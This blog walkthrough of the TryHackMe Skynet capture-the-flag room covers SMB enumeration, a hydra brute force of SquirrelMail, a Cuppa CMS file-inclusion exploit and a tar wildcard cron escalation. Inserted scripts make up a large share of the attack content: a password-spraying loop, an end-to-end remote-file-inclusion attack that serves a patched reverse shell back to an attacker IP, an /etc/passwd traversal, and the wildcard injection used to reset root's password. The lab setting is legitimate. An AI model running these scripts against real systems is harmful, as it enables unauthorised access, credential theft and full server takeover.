narancs's blog

TryHackMe – Skynet walkthrough

TryHackMe Skynet logo

Introduction

Walkthrough for the Skynet CTF room on TryHackMe. Tools used: nmap, gobuster, smbmap, hydra and a Cuppa CMS file inclusion exploit from Exploit DB.

Enumeration

nmap scan result:

Samba (anonymous)

I used smbmap to enumerate SMB shares.

smbmap found 4 shares on the host. The share named anonymous is accessible without a password, so we can take a look at what files are available on it. There is another interesting share, milesdyson, but it requires a password that we do not have yet.

Checking anonymous share:

On the share I found a file called attention.txt and a directory named logs containing 3 files. I downloaded attention.txt and log1.txt (the other 2 log files are empty).

attention.txt:

    A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
    -Miles Dyson

log1.txt file looks like a password list, containing 31 lines with a (potential) password on each line.

So at this point I had a username, ‘milesdyson’, and a list of passwords. I used hydra to try the list against SSH and IMAP, but none of the passwords worked. I moved on to enumerate the web server next.

HTTP

I used gobuster to enumerate directories on the web server.

Out of the 6 directories found only /squirrelmail was accessible, the other 5 directories were forbidden.

Visiting /squirrelmail redirected me to the SquirrelMail login page. I tried to log in with incorrect credentials to check the behaviour of the site.

Things I noticed:

  • The login attempt was relatively slow: it took 1-2 seconds until I received the error
  • I was redirected from /squirrelmail/src/login.php to /squirrelmail/src/redirect.php
  • The page after failed login contains the strings “ERROR” and “Unknown user or password incorrect.”

I used hydra with the http-post-form module to crack the password of milesdyson, using log1.txt as the password list. For the test condition I used ‘F=ERROR’: hydra considers a password incorrect if the string ‘ERROR’ appears in the page returned after the login attempt.

Since it took 1-2 seconds until the failed-login page appeared, I also had to add the -c option; otherwise hydra returned incorrect results. F=ERROR is a negative match, so any reply that comes back without that string (for example a truncated or timed-out response, which is likely when several threads hit a slow login at once) is reported as a valid password. -c makes the attempts serial with a fixed wait between them:

    -c TIME   wait time per login attempt over all threads (enforces -t 1)

I used 2 for the value of TIME and it worked fine:

    hydra -l milesdyson -P log1.txt 10.10.218.122 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^:F=ERROR" -c 2

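The same check written out as a small shell script, added here as an example and not part of the original post: it sends the same two form fields as the hydra command, treats a page containing ERROR as a failed attempt, waits between attempts the way -c 2 does and, unlike a bare F= match, refuses to report an empty reply as a hit. TARGET, WAIT and the HTTP_POST hook are assumptions of this example; curl must be installed.

```shell
#!/bin/sh
# Added example, not from the original post: the check hydra performs for
# http-post-form, written out so the F=ERROR logic and the effect of -c are
# visible. Assumed (hypothetical, override via the environment): TARGET,
# WAIT, and that curl is installed. HTTP_POST names the command that sends
# one login attempt, so the loop can be exercised offline with a fake.
TARGET="${TARGET:-http://10.10.218.122}"
LOGIN_PATH="/squirrelmail/src/login.php"
FAILURE_MARKER="ERROR"                  # hydra's F=ERROR: this string means "wrong password"
WAIT="${WAIT:-2}"                       # hydra's -c 2: one attempt at a time, 2 s apart
HTTP_POST="${HTTP_POST:-curl_post}"

# curl_post USER PASS -> prints the body of the page reached after the
# login.php -> redirect.php redirect (same form fields as the hydra command).
curl_post() {
    curl -s -L -m 15 -b /dev/null -c /dev/null \
        --data-urlencode "login_username=$1" \
        --data-urlencode "secretkey=$2" \
        "$TARGET$LOGIN_PATH" < /dev/null
}

# classify BODY -> failed | success | inconclusive
# F= is a negative match: anything without the marker would count as a hit,
# so an empty reply (timeout, dropped connection) is reported separately
# instead of being mistaken for a valid password.
classify() {
    if [ -z "$1" ]; then
        echo inconclusive
    elif printf '%s\n' "$1" | grep -q -- "$FAILURE_MARKER"; then
        echo failed
    else
        echo success
    fi
}

# spray USER WORDLIST -> prints the first password whose reply lacks the
# marker and returns 0; returns 1 if the list is exhausted. Attempts are
# serial with WAIT seconds between them; an inconclusive reply is retried once.
spray() {
    user="$1"; list="$2"
    while IFS= read -r pass || [ -n "$pass" ]; do
        [ -z "$pass" ] && continue
        verdict=$(classify "$("$HTTP_POST" "$user" "$pass")")
        if [ "$verdict" = inconclusive ]; then
            sleep "$WAIT"
            verdict=$(classify "$("$HTTP_POST" "$user" "$pass")")
        fi
        if [ "$verdict" = success ]; then
            echo "$pass"
            return 0
        fi
        sleep "$WAIT"
    done < "$list"
    return 1
}

# Stand-alone use: sh spray.sh milesdyson log1.txt
if [ $# -eq 2 ]; then
    spray "$1" "$2"
fi
```

Because the success condition is the absence of a string, always confirm a reported hit with a single manual login before building on it. Pointing HTTP_POST at a function that returns canned pages lets the loop be exercised without a target.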
I logged in to SquirrelMail with the cracked password. There were 3 mails in the inbox. The first mail contained the password for the Samba share of milesdyson.

Samba (milesdyson)

I accessed the share with the password found in the mail.

There was an interesting file in the notes directory called important.txt. I downloaded it using the get command.

important.txt:

    1. Add features to beta CMS /45************yd
    2. Work on T-800 Model 101 blueprints
    3. Spend more time with my wife

HTTP round 2

I visited the beta CMS page mentioned in important.txt.

Miles Dyson personal page

The index.html page did not contain anything that would be useful, so I used gobuster again to discover sub-directories.

The /45************yd/administrator page was a login page to Cuppa CMS.

User flag

I found an exploit on Exploit DB: https://www.exploit-db.com/exploits/25971

The description of the exploit:

    #####################################################
    DESCRIPTION
    #####################################################
    An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.
    http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
    #####################################################
    EXPLOIT
    #####################################################
    http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
    http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

To test it, I visited the below URL:

    http://10.10.218.122/45************yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

And it worked.

It is also vulnerable to remote file inclusion, so I used RFI to trigger a reverse shell on the target.

  1. I downloaded PHP reverse shell from https://github.com/pentestmonkey/php-reverse-shell, then changed the IP in the script to my IP address
  2. started an HTTP server with Python to serve the file for RFI
  3. started a listener on the port specified in php-reverse-shell.php
  4. triggered the reverse shell using the RFI vulnerability
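The procedure above as shell functions, added here as an example rather than code from the original post. It keeps the LFI probe from the previous step as a sanity check, so the RFI is only triggered if the traversal really returned /etc/passwd and not an error page. ATTACKER_IP, HTTP_PORT, SHELL_PORT and the redacted CMS directory are placeholders to replace; the script expects pentestmonkey's php-reverse-shell.php in the current directory.

```shell
#!/bin/sh
# Added example, not from the original post: the LFI check and the four RFI
# steps above as shell functions. Hypothetical values, override via the
# environment: ATTACKER_IP, HTTP_PORT, SHELL_PORT, TARGET; CMS_BASE is the
# beta CMS directory, redacted in the post.
TARGET="${TARGET:-http://10.10.218.122}"
CMS_BASE="${CMS_BASE:-/45************yd}"
VULN_PAGE="/administrator/alerts/alertConfigField.php"
ATTACKER_IP="${ATTACKER_IP:-10.9.0.1}"
HTTP_PORT="${HTTP_PORT:-8000}"
SHELL_PORT="${SHELL_PORT:-4444}"

# lfi_url -> the traversal URL from the Exploit DB entry, aimed at the target.
lfi_url() {
    echo "$TARGET$CMS_BASE$VULN_PAGE?urlConfig=../../../../../../../../../etc/passwd"
}

# rfi_url FILE -> include FILE from our HTTP server. The trailing "?" follows
# the Exploit DB entry: anything the application appends to the include path
# ends up in our URL's query string instead of altering the file name.
rfi_url() {
    echo "$TARGET$CMS_BASE$VULN_PAGE?urlConfig=http://$ATTACKER_IP:$HTTP_PORT/$1?"
}

# looks_like_passwd (stdin) -> 0 if the body really is /etc/passwd, 1 for an
# error page, login redirect or empty reply. The root entry is the reliable sign.
looks_like_passwd() {
    grep -q '^root:x:0:0:'
}

# patch_reverse_shell SRC DST -> step 1: copy the pentestmonkey script with our
# IP and port filled in. The script carries two lines of this shape:
#   $ip = '127.0.0.1';  // CHANGE THIS
#   $port = 1234;       // CHANGE THIS
patch_reverse_shell() {
    sed -e "s/^\\\$ip = '[^']*';/\$ip = '$ATTACKER_IP';/" \
        -e "s/^\\\$port = [0-9]*;/\$port = $SHELL_PORT;/" "$1" > "$2"
}

# run_attack -> steps 1-4 end to end (needs network, python3, curl and nc;
# not exercised by the offline test).
run_attack() {
    patch_reverse_shell php-reverse-shell.php shell.php             # step 1
    # step 2: http.server sends the file byte for byte, so the target receives
    # PHP source (which it then evaluates) rather than the output of the script.
    python3 -m http.server "$HTTP_PORT" >/dev/null 2>&1 &
    srv=$!
    if ! curl -s -m 10 "$(lfi_url)" | looks_like_passwd; then
        echo "LFI probe did not return /etc/passwd, not triggering the RFI" >&2
        kill "$srv"; return 1
    fi
    echo "Step 3: run 'nc -lvnp $SHELL_PORT' in another terminal, then press Enter"
    read -r _
    curl -s "$(rfi_url shell.php)" >/dev/null &                      # step 4: blocks while the shell lives
    echo "RFI request sent; the listener should now hold a shell as www-data."
}
```

Do not host the payload on a PHP-enabled web server: it would be executed on your own machine and the target would include only its output. A plain static server such as python3 -m http.server is what the RFI needs.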

I received a shell as www-data user. I was able to read the user flag from /home/milesdyson/user.txt

Root flag

I upgraded my shell using the following commands:

    python3 -c 'import pty;pty.spawn("/bin/bash")'
    export TERM=xterm
    *** press CTRL+Z to background the shell ***
    stty raw -echo; fg

Then I started looking for a privilege escalation path. I found an interesting line in /etc/crontab:

    */1 *   * * *   root    /home/milesdyson/backups/backup.sh

The /home/milesdyson/backups/backup.sh script is executed every minute as the root user. The content of the script:

    #!/bin/bash
    cd /var/www/html
    tar cf /home/milesdyson/backups/backup.tgz *

Only root can edit the script, but the unquoted wildcard in the tar command can be exploited: the shell expands * in /var/www/html, a directory that www-data can write to, so any file names we create there are passed to tar as arguments. This vulnerability is described in the Linux PrivEsc room (Task 10 Cron Jobs – Wildcards).

What we need to do is create 2 files in /var/www/html named ‘--checkpoint=1‘ and ‘--checkpoint-action=exec=<command>‘. Once the cron job runs, the shell expands * and the tar command becomes:

    tar cf /home/milesdyson/backups/backup.tgz --checkpoint=1 --checkpoint-action=exec=<command>

Essentially, tar treats the two file names as command line options: --checkpoint=1 tells it to run the checkpoint action after every record it writes, and --checkpoint-action=exec=<command> runs the given command through /bin/sh. Since the cron job runs as root, this lets us execute arbitrary commands as the root user. We have several options, e.g.:

  • Output the contents of /root/root.txt to a file we can read (assuming that the root flag is stored in that file)
  • Trigger a reverse shell as root user

I decided to change the password of the root user with usermod. I used the following commands to create the files for the tar wildcard exploit:

    echo 'usermod --password $(echo password123 | openssl passwd -1 -stdin) root' > /var/www/html/usermod.sh
    touch "/var/www/html/--checkpoint-action=exec=sh usermod.sh"
    touch "/var/www/html/--checkpoint=1"
    chmod +x /var/www/html/usermod.sh

After waiting for 1 minute, the cron job was executed and the password of root has been changed to ‘password123’. I switched to root user and found the root flag in /root/root.txt
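To see the mechanism without waiting for the cron job, here is the same injection run locally as an unprivileged user with a harmless payload. This is an added example, not code from the original post, and it needs GNU tar (--checkpoint is a GNU extension); the file and directory names are constructed for the demo. The fixed variant shows the one small change that closes the hole.

```shell
#!/bin/sh
# Added example, not from the original post: the tar wildcard injection run
# locally in a throwaway directory as the current user, so the mechanism can
# be observed without the cron job or root. Requires GNU tar.

# backup_vulnerable DIR ARCHIVE -> what backup.sh does: the shell expands the
# unquoted * inside DIR, so a file named --checkpoint=1 becomes a tar option.
backup_vulnerable() {
    ( cd "$1" && tar cf "$2" * ) 2>/dev/null
}

# backup_fixed DIR ARCHIVE -> "--" ends option parsing, so every expansion of
# the glob is taken as a path. Archiving "." instead of * also works and
# additionally picks up dotfiles.
backup_fixed() {
    ( cd "$1" && tar cf "$2" -- * ) 2>/dev/null
}

# plant_payload DIR MARKER -> the three files from the walkthrough, with a
# payload that only creates MARKER (stand-in for usermod.sh).
plant_payload() {
    printf 'touch "%s"\n' "$2" > "$1/payload.sh"
    : > "$1/--checkpoint=1"
    : > "$1/--checkpoint-action=exec=sh payload.sh"
}

# demo MODE -> prints "executed" if the planted payload ran during the backup,
# "not-executed" otherwise. MODE is "vulnerable" or "fixed".
demo() {
    dir=$(mktemp -d)
    archive=$(mktemp)
    marker="$dir/payload-ran"
    echo '<html>site content</html>' > "$dir/index.html"
    plant_payload "$dir" "$marker"
    if [ "$1" = vulnerable ]; then
        backup_vulnerable "$dir" "$archive" || true
    else
        backup_fixed "$dir" "$archive" || true
    fi
    if [ -e "$marker" ]; then echo executed; else echo not-executed; fi
    rm -rf "$dir" "$archive"
}

echo "unquoted glob:  $(demo vulnerable)"
echo "with -- guard:  $(demo fixed)"
```

The payload runs with whatever privileges tar has, so in the cron job that is root. Two small points on the walkthrough's own commands: chmod +x is not needed because the file is run as sh usermod.sh, and the archive path being outside /var/www/html is what keeps the backup from swallowing its own output. On the defensive side, the fix is to stop tar from parsing file names as options, with -- as above or by archiving . instead of *.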

Summary

During the Skynet CTF room on TryHackMe, I was able to gain root access to the target exploiting several vulnerabilities.

I started by enumerating Samba. On the anonymous share I found a username and a password list. Then I used gobuster to enumerate directories on the web server and found a login page to SquirrelMail. Using the information found, I was able to gain access to milesdyson’s email inbox. The password for the user’s Samba share was included in an email in the inbox.

On the user’s share I found a note about a beta CMS page. Using gobuster, I was able to find the login page to Cuppa CMS. I used a file inclusion exploit from Exploit DB to gain initial access to the target.

Then I checked for privilege escalation paths. I found a vulnerable cron job, that I was able to exploit and gain root access to the machine.
